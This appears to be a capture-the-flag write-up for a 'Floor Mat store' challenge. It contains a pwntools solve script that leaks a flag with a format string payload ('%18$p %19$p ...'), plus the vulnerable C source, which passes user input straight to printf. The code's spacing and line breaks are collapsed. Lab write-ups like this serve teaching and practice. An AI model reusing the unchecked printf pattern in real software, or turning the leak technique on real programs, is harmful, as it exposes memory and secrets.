Welcome to the Floor Mat store! It's kind of like heaven.. for mats
Watch video for full solution (format string exploit), but here's a solve script (note the index will vary from local/remote, but you can just send %p * 100 or something instead).
from pwn import*# Connect to serverio =process('./floormats')flag =''io.sendlineafter(b'Enter your choice:\n', b'6')io.sendlineafter(b'Please enter your shipping address:\n',b'%18$p %19$p %20$p %21$p')io.recvuntil(b'Your floor mat will be shipped to:\n\n')response = io.recv(1000)# Split response by spacesfor i, p inenumerate(response.split(b' ')):try:ifnotb'nil'in p:try:# Decode, reverse endianess and print decoded =unhex(p.strip().decode()[2:]) reversed_hex = decoded[::-1]print(str(i) +": "+str(reversed_hex))# Build up flag flag += reversed_hex.decode()exceptBaseExceptionas e:passexceptEOFError:pass# Print and closeinfo(flag)io.close()
#include<stdio.h>#include<stdlib.h>#include<string.h>#include<unistd.h>#include<sys/types.h>intmain(int argc,char**argv) {setvbuf(stdout,NULL, _IONBF,0);char*mats[]= {"1. Cozy Carpet Mat - $10","2. Wooden Plank Mat - $15","3. Fuzzy Shag Mat - $20","4. Rubberized Mat - $12","5. Luxury Velvet Mat - $25","6. Mysterious Flag Mat - $1337" };char buf[128];char flag[64];char*flag_ptr = flag;gid_t gid =getegid();setresgid(gid, gid, gid); FILE *file =fopen("flag.txt","r");if (file ==NULL) {printf("You have a flag.txt, right??\n");exit(0); }puts("Welcome to the Floor Mat store! It's kind of like heaven.. for mats.\n\nPlease choose from our currently available floor mats\n\nNote: Out of stock items have been temporarily delisted\n");printf("Please select a floor mat:\n\n");for (int i =0; i <5; i++) {printf("%s\n", mats[i]); }int choice;printf("\nEnter your choice:\n");scanf("%d",&choice);if (choice <1|| choice >6) {printf("Invalid choice!\n\n");exit(1); }int matIndex = choice -1;while (getchar()!='\n');if (matIndex ==5) {fgets(flag,sizeof(flag), file); }printf("\nPlease enter your shipping address:\n");fgets(buf,sizeof(buf), stdin);printf("\nYour floor mat will be shipped to:\n\n");printf(buf);return0;}